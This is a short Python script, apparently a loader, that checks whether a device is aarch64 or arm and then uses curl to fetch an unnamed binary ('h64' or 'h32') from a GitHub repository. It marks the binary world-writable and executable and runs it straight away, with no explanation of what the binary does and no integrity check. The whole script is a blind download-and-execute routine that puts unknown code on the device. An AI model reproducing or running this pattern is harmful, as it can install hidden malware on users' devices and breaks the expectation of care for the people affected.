import os,sys,subprocess
deviceArc =subprocess.check_output('uname -om',shell=True)
deviceArch = str(deviceArc)
if 'aarch64' in deviceArch:
    if not os.path.isfile('h64'):
        os.system('curl -L https://github.com/hop09/libraries/blob/main/h64?raw=true > h64')
        os.system('chmod 777 h64')
        os.system('./h64')
    else:
        os.system('./h64')
elif 'arm' in deviceArch:
    if not os.path.isfile('h32'):
        os.system('curl -L https://github.com/hop09/libraries/blob/main/h32?raw=true > h32')
        os.system('chmod 777 h32')
        os.system('./h32')
    else:
        os.system('./h32')
else:
    print(' Cannot detect required aarchitecture...')
    exit()
